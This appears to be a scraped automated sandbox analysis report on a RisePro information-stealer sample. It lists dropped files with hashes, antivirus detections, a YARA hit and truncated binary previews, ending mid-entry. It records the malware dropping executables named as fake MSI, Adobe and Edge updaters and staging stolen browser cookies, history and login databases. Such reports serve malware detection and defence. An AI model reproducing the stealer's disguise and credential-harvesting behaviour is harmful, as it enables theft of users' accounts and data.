                                    C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exefile.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                      file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                        file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                          file.exeGet hashmaliciousClipboard Hijacker, PrivateLoader, VidarBrowse
                                            file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                              file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                  file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                    file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                      file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse

                                                        Created / dropped Files

                                                        C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                                        Category:dropped
                                                        Size (bytes):4563640
                                                        Entropy (8bit):7.906115886926003
                                                        Encrypted:false
                                                        SSDEEP:98304:RpvmMxvdjYr/2BLOizdh/0Rzs24+WhXWXfRqCFh6MacgD5hB:vlVjMuBx0R7RrXpqiUhB
                                                        MD5:AF6E384DFABDAD52D43CF8429AD8779C
                                                        SHA1:C78E8CD8C74AD9D598F591DE5E49F73CE3373791
                                                        SHA-256:F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
                                                        SHA-512:B55BA87B275A475E751E13EC9BAC2E7F1A3484057844E210168E2256D73D9B6A7C7C7592845D4A3BF8163CF0D479315418A9F3CB8F2F4832AF88A06867E3DF93
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 66%
                                                        Joe Sandbox View:
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        Preview:MZ@.....................................!..L.!Win32 .EXE...$@...PE..L....M.a.....................^.......w......0....@...........................}.....m.F.......................................w.......w.|.............E.............................................................P.w..............................MPRESS1.pw.......?......................MPRESS22.....w.......?..................rsrc...|.....w.......?.............@..............................................................................v2.19w...?. ...o......G>H.r9aQ..(.......`....=....?....!.Z..&I........I18..Z!..Y..s...[QX....a....YY...).v.....n......|)....^f..+.>..84h82g...>*.hb\...E.(.x.....@.8_.9.4U.m..'.s......#.....03.......O..]`..S2.@#.........oF~.*.R..Q..q.o.yn...OA@|....g...F....0.j.......s/..H..+ 0C.!....7s..^H,...... ..{...............D......r.I..,|........u.6......E>q..}....g..).U..ME.'.j}.........7^...w.......Le......k.T.`.#%....b..n.F.&-o..../8S.E..{1.E..,....<.c|b.z.Fz........|..W"p.

                                                        C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                                        Category:dropped
                                                        Size (bytes):4563640
                                                        Entropy (8bit):7.906115886926003
                                                        Encrypted:false
                                                        SSDEEP:98304:RpvmMxvdjYr/2BLOizdh/0Rzs24+WhXWXfRqCFh6MacgD5hB:vlVjMuBx0R7RrXpqiUhB
                                                        MD5:AF6E384DFABDAD52D43CF8429AD8779C
                                                        SHA1:C78E8CD8C74AD9D598F591DE5E49F73CE3373791
                                                        SHA-256:F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
                                                        SHA-512:B55BA87B275A475E751E13EC9BAC2E7F1A3484057844E210168E2256D73D9B6A7C7C7592845D4A3BF8163CF0D479315418A9F3CB8F2F4832AF88A06867E3DF93
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 66%
                                                        Joe Sandbox View:
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        • Filename: file.exe, Detection: malicious, Browse
                                                        Preview:MZ@.....................................!..L.!Win32 .EXE...$@...PE..L....M.a.....................^.......w......0....@...........................}.....m.F.......................................w.......w.|.............E.............................................................P.w..............................MPRESS1.pw.......?......................MPRESS22.....w.......?..................rsrc...|.....w.......?.............@..............................................................................v2.19w...?. ...o......G>H.r9aQ..(.......`....=....?....!.Z..&I........I18..Z!..Y..s...[QX....a....YY...).v.....n......|)....^f..+.>..84h82g...>*.hb\...E.(.x.....@.8_.9.4U.m..'.s......#.....03.......O..]`..S2.@#.........oF~.*.R..Q..q.o.yn...OA@|....g...F....0.j.......s/..H..+ 0C.!....7s..^H,...... ..{...............D......r.I..,|........u.6......E>q..}....g..).U..ME.'.j}.........7^...w.......Le......k.T.`.#%....b..n.F.&-o..../8S.E..{1.E..,....<.c|b.z.Fz........|..W"p.

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\file.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):522
                                                        Entropy (8bit):5.358731107079437
                                                        Encrypted:false
                                                        SSDEEP:12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLU84qpE4KlKDE4KhKiKhk
                                                        MD5:93E4C46884CB6EE7CDCC4AACE78CDFAC
                                                        SHA1:29B12D9409BA9AFE4C949F02F7D232233C0B5228
                                                        SHA-256:2690023A62F22AB7B27B09351205BA31173B50B77ACA89A5759EDF29A1FB17F7
                                                        SHA-512:E9C3E2FCEE4E13F7776665295A4F6085002913E011BEEF32C8E7065140937DDE1963182B547CC75110BF32AE5130A6686D5862076D5FFED9241F183B9217FA4D
                                                        Malicious:false
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\l2[1].exe

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                                        Category:dropped
                                                        Size (bytes):4563640
                                                        Entropy (8bit):7.906115886926003
                                                        Encrypted:false
                                                        SSDEEP:98304:RpvmMxvdjYr/2BLOizdh/0Rzs24+WhXWXfRqCFh6MacgD5hB:vlVjMuBx0R7RrXpqiUhB
                                                        MD5:AF6E384DFABDAD52D43CF8429AD8779C
                                                        SHA1:C78E8CD8C74AD9D598F591DE5E49F73CE3373791
                                                        SHA-256:F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
                                                        SHA-512:B55BA87B275A475E751E13EC9BAC2E7F1A3484057844E210168E2256D73D9B6A7C7C7592845D4A3BF8163CF0D479315418A9F3CB8F2F4832AF88A06867E3DF93
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 66%
                                                        Preview:MZ@.....................................!..L.!Win32 .EXE...$@...PE..L....M.a.....................^.......w......0....@...........................}.....m.F.......................................w.......w.|.............E.............................................................P.w..............................MPRESS1.pw.......?......................MPRESS22.....w.......?..................rsrc...|.....w.......?.............@..............................................................................v2.19w...?. ...o......G>H.r9aQ..(.......`....=....?....!.Z..&I........I18..Z!..Y..s...[QX....a....YY...).v.....n......|)....^f..+.>..84h82g...>*.hb\...E.(.x.....@.8_.9.4U.m..'.s......#.....03.......O..]`..S2.@#.........oF~.*.R..Q..q.o.yn...OA@|....g...F....0.j.......s/..H..+ 0C.!....7s..^H,...... ..{...............D......r.I..,|........u.6......E>q..}....g..).U..ME.'.j}.........7^...w.......Le......k.T.`.#%....b..n.F.&-o..../8S.E..{1.E..,....<.c|b.z.Fz........|..W"p.

                                                        C:\Users\user\AppData\Local\Temp\3mPJKgsigfIE_SLZsizIH3r.zip

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                        Category:dropped
                                                        Size (bytes):683968
                                                        Entropy (8bit):7.997642237350495
                                                        Encrypted:true
                                                        SSDEEP:12288:klyDmq4PXDpxyALBKH1rZ1UBzv7OXhOQV+zCR4J7w5kJOD+cOCi4yGxrf2tW:k2mq4v1xjKH/1UNKXieeMCJOrOCPyIuW
                                                        MD5:0223DDC38CB49A02584667227AFC77D6
                                                        SHA1:865F01AD8FE1966297FE8158DFCA296D38267A6E
                                                        SHA-256:32D1578C92310637299FDB57AF4A2A08D54AE7127EB5BDC388D71D9CCC9434D8
                                                        SHA-512:C81A844D41D707863C2D1CE9B010706E0D78407473C3DA8915BC1894A6EE2A1F3BD64510C370257B922C0DF782D215897DF80318AEDF02D570DE5AA04AC19422
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: C:\Users\user\AppData\Local\Temp\3mPJKgsigfIE_SLZsizIH3r.zip, Author: Joe Security
                                                        Preview:PK........"..X................Cookies\..PK........"..XQn.+............Cookies\Chrome_Default.txt.G..r...U.#.5C.....s$..-.D...7.\..$.G.)o....:....Z.C.f_..pm............"..t..t....}.k.@...a.2+P`.0.x.>....s..k%.._..b..P..((......B.....`.7..-m..JY..F....E.*.l.....I..&.....<J..M.......,V...)b.....Q..k......M?.5L....h}......X..'.0..tB.G...\;.a....4.......B4.......J.4.6.y:....4.-.UfE...3A*p.U5UX....Z.g:*e.j.C..Bw..........e..a^.vU:....$..U......B..`._.e.....+...9.{u...7.e...H.]02...%yR".0...x...P<..N....R.}....{.G...;..c..x...kw.'S>.d|.....B..k.9.t.!>.rh...~n.[....s#/....`.!..Kb8%&.vZB`....O|.....>K......L*...d0..03..t...T&.......`N.xp.."..J.......Q.....c..5...).Z.91.6.j..G.....Wr...a.52!..(^.U.....6....dB.D.^...7..0H.\J9.H.$^`e"..d...\....B.8Z=.qeP.3Y.>..'W.X..T..>z...,..K......g....%B.w4#...;.[]u|....v...3.;L..U?..b.....u..*..... .......F...P.a...|R*3.=......r.:.64...#D..^..>.A..ZT.]E........t...f...1..3.....`...X.....C.]%...p.p.ym

                                                        C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                                        Category:dropped
                                                        Size (bytes):4563640
                                                        Entropy (8bit):7.906115886926003
                                                        Encrypted:false
                                                        SSDEEP:98304:RpvmMxvdjYr/2BLOizdh/0Rzs24+WhXWXfRqCFh6MacgD5hB:vlVjMuBx0R7RrXpqiUhB
                                                        MD5:AF6E384DFABDAD52D43CF8429AD8779C
                                                        SHA1:C78E8CD8C74AD9D598F591DE5E49F73CE3373791
                                                        SHA-256:F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
                                                        SHA-512:B55BA87B275A475E751E13EC9BAC2E7F1A3484057844E210168E2256D73D9B6A7C7C7592845D4A3BF8163CF0D479315418A9F3CB8F2F4832AF88A06867E3DF93
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 66%
                                                        Preview:MZ@.....................................!..L.!Win32 .EXE...$@...PE..L....M.a.....................^.......w......0....@...........................}.....m.F.......................................w.......w.|.............E.............................................................P.w..............................MPRESS1.pw.......?......................MPRESS22.....w.......?..................rsrc...|.....w.......?.............@..............................................................................v2.19w...?. ...o......G>H.r9aQ..(.......`....=....?....!.Z..&I........I18..Z!..Y..s...[QX....a....YY...).v.....n......|)....^f..+.>..84h82g...>*.hb\...E.(.x.....@.8_.9.4U.m..'.s......#.....03.......O..]`..S2.@#.........oF~.*.R..Q..q.o.yn...OA@|....g...F....0.j.......s/..H..+ 0C.!....7s..^H,...... ..{...............D......r.I..,|........u.6......E>q..}....g..).U..ME.'.j}.........7^...w.......Le......k.T.`.#%....b..n.F.&-o..../8S.E..{1.E..,....<.c|b.z.Fz........|..W"p.

                                                        C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll

                                                        Download File
                                                        Process:C:\Users\user\Desktop\file.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):760320
                                                        Entropy (8bit):6.561572491684602
                                                        Encrypted:false
                                                        SSDEEP:12288:wCMz4nuvURpZ4jR1b2Ag+dQMWCD8iN2+OeO+OeNhBBhhBBgoo+A1AW8JwkaCZ+36:wCs4uvW4jfb2K90oo+C8JwUZc0
                                                        MD5:544CD51A596619B78E9B54B70088307D
                                                        SHA1:4769DDD2DBC1DC44B758964ED0BD231B85880B65
                                                        SHA-256:DFCE2D4D06DE6452998B3C5B2DC33EAA6DB2BD37810D04E3D02DC931887CFDDD
                                                        SHA-512:F56D8B81022BB132D40AA78596DA39B5C212D13B84B5C7D2C576BBF403924F1D22E750DE3B09D1BE30AEA359F1B72C5043B19685FC9BF06D8040BFEE16B17719
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v...2...2...2...]...6....f..0...)=..,...)=....;...;...2.~.C...)=..i...)=......)=..3...)=..3...Rich2...........PE..L....#da...........!.....(...n...............@......................................(.....@.............................C.......x................................n...B..................................@............@...............................text....&.......(.................. ..`.rdata......@.......,..............@..@.data...`...........................@....rsrc...............................@..@.reloc..R...........................@..B........................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\02zdBXl47cvzcookies.sqlite

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):98304
                                                        Entropy (8bit):0.08235737944063153
                                                        Encrypted:false
                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\1cU8LgDKYNdaWeb Data

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):114688
                                                        Entropy (8bit):0.9746603542602881
                                                        Encrypted:false
                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\3b6N2Xdh3CYwplaces.sqlite

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):5242880
                                                        Entropy (8bit):0.037963276276857943
                                                        Encrypted:false
                                                        SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                        MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                        SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                        SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                        SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\5w9d2wtl6W7LWeb Data

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):114688
                                                        Entropy (8bit):0.9746603542602881
                                                        Encrypted:false
                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\AhUc0FWfOlxwWeb Data

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                        Category:dropped
                                                        Size (bytes):106496
                                                        Entropy (8bit):1.1358696453229276
                                                        Encrypted:false
                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\D87fZN3R3jFeplaces.sqlite

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):5242880
                                                        Entropy (8bit):0.037963276276857943
                                                        Encrypted:false
                                                        SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                        MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                        SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                        SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                        SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\JzfQ8mMmJVvXHistory

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                        Category:dropped
                                                        Size (bytes):159744
                                                        Entropy (8bit):0.7873599747470391
                                                        Encrypted:false
                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\PlAoyWlIwtSEHistory

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                        Category:dropped
                                                        Size (bytes):159744
                                                        Entropy (8bit):0.7873599747470391
                                                        Encrypted:false
                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\SAs9CHY3YroDLogin Data For Account

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                        Category:dropped
                                                        Size (bytes):40960
                                                        Entropy (8bit):0.8553638852307782
                                                        Encrypted:false
                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\YTmxxq1AC9AlHistory

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):126976
                                                        Entropy (8bit):0.47147045728725767
                                                        Encrypted:false
                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                        Malicious:false
                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\bL5qEt56S6XoHistory

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                        Category:dropped
                                                        Size (bytes):126976
                                                        Entropy (8bit):0.47147045728725767
                                                        Encrypted:false
                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
